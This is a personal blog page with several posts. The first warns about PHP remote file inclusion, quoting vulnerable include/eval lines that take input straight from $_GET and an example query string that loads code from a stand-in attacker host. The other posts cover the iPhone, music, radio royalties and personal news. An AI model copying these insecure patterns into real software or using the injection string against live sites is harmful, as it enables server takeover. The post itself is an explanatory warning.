Rinsefirst

I’m becoming more and more of the belief that I should REFUSE to host people who either upload other people’s code without knowing how it works, OR write poor code themselves.

Why is this?

Simple… In the last year, I’ve had two people who have uploaded code that they did not write that contained a query string that looked like this:

index.html?abs_path=http://www.jrcorps.com/

Now, that alone wouldn’t be so bad, if they didn’t have a line of code that looked like this:

eval($_GET['abs_path');

or

include $_GET['abs_path');

This is almost as bad:

include "/home/". $_GET['abs_path'];

In any case, what am I trying to say… All of these commands allow for Remote Code Execution. All of them, can set me up for a very very bad day. Here’s what happens:

1. User uploads bad code
2. Enemy writes a file browser/remote system php script.
3. Enemy finds User’s bad code.
4. Enemy sends a line like this: ?abs_path=http://badguyssite.com/asdf.txt
5. User’s code runs Enemy’s code on User’s server
6. Enemy has as much control over the server as the web server does.

Now some of you are saying, “Well my webserver runs as nobody and all my permissions are setup right… What can anyone do to hurt me as user Nobody?

The short answer: probably nothing. The long answer is, if your using php, then you probably have a tmp folder… If you have a tmp folder, the enemy can then upload code to your server.

But Justin… they still can only run it as Nobody…

Yes, but nobody has the power to do somethings… For example, serve up massive amounts of data, run infinite “for” loops, or simply find a way to install a “root kit”. In any case, they can do things to make your server unusable… They might not be able to compromise data… but unusable is just as bad in some cases.

If your machine is ever compromised this way, I strongly recommend finding the hole as fast as possible and removing it from your system. Once you do, I strongly recommend you remove any code that they might have uploaded to your box. Lastly, I strongly recommend that you run a few scans on your box, including but not limited to:

• A Nessus Scan
• A RkHunter Scan
• A Virus Scan
• A Process Scan
• A Port Scan

I’ve included links to some of these to the left side.

Count down to some sort of vacation: 2 days

Continuing with my mini theme of technology and music, I couldn’t help but to mention that the Iphone I guess comes out today. I personally won’t be getting one anytime soon… and if I do, it will be because Apple has decided to make it available to providers other than AT&T or because someone has figured out the unlock code for the silly device. Even then, I will probably wait for the price to come down a bit.

For those of you who are now one of the lucky iphone owners… Or heck, even those of you who have an Ipod… If you are not taking advantage of the free song of the week over at itunes… Shame on you. Every week, Apple gives away a song in hopes that you will buy more. It’s great for Apple. It’s great for the artists. And it’s great for people like me, who want more legal music, but don’t want to pay for it.

In any case, I’ve included a nice little banner ad to the left… Hopefully someone will get some free enjoyment out of the deal. Oh, and if you haven’t started downloading music LEGALLY yet… I STRONGLY advise that you do, and that you use ITUNES! (Man I love podcasts)

I think I’ve mentioned in the past that I work better with music. Steady rythms allow my fingers and my mind to stay focused, and at a steady pace. Most of the time, I listen to some sort of trance/techno/europop/remixed pop stuff. The two big keys for me though are this:

1) Above all, It has to move. Slow, put me to sleep music, just doesn’t cut it when I’m programming, or trying to do anything for that matter… except maybe sleep.

2) If at all possible, it must have lyrics I can sing with (and preferably, know). Some of you might be surprised at how often I randomly shout lyrics to the song I’m listening to… Then again, some of you wouldn’t be surprised at all.

All that said, I’ve decided I want to share some of the “Remixed” music that I’ve been listening to lately. I know that it’s something that John and Alex quite often, and I don’t plan on making an extreme habit of this… But who knows, maybe you’ll find something to put on that zune iPod Iphone of yours. All songs linked for your pleasure to the right.

So while the big news of the day will undoubtedly be Paris Hilton being release from jail… the thing I am more concerned about at the moment is a royalty increase that is set to go into effect starting July 15th.

The Royalty hike, as I understand it, is basically a huge increase in fees for those who host online radio stations. From what I read though, the biggest problem with the increase is a new “per station” fee.

Again, as I understand it, this would mean any website that allows custom playlists would be subject to a fee for each “custom” playlist created. It could easily mean the end of sites like Live365 and Yahoo Music. That would in turn mean the end of WTMK (one of my favorite video game music stations).

I suppose the smart thing would be for me to tell you to contact your senator and relay the message that they need to get on these judge’s to override the rate hike. Otherwise, we’ll all be missing some of our favorite online radio stations…

Want to read about it yourself? here

For a long time, I’ve had this idea, that if you work hard enough, you can eventually get paid to sleep. For awhile, I thought I was getting close, but as I come to find out, your more likely to get paid NOT to sleep, then to get paid to sleep.

That said, this weekend has reminded me that there are some things in life other than computers (and planning a wedding). A portion of my Nebraska family came and stayed with us for the weekend. They arrived Saturday, and immediately took off for the Mall of America. Being the geek I am, I stayed back, worked for a little bit, then headed to a grad party (congratulations Adam). From there it was out to the MOA, where I spent the rest of my evening…

Sunday, we went to a morning boat cruise brunch (Afton House Inn, worth the money). From there we went to Treasure Island resort and casino, where I was too chicken to play poker in the poker room.

By the time I got home Sunday night, I just crashed into my bed. Work was the farthest thing from my mind for the first time in 3 months. Sure enough, I had a half dozen emails sitting on my desktop when I woke this morning… but knowing that they all survived until Monday makes me realize that I don’t have to spend every minute of my life programming.

And neither should you.

Ok, so going along with my last post about the Benjamin’s… I’m kind of curious what people think of if someone yelled “I’ve been Joe’d”. I can think of two things write off the bat:

1: Someone poored a cup of Coffee over you and now you have to change your pants so as not to look like you have bladder control issues.

2: Your blog has been down for the last 16 hours because someone named Joe deleted your entry in the MYSQL privilege table and didn’t realize it..

In case your curious, thats why there was a pretty little message on the front page of my blog for the last 16 hours…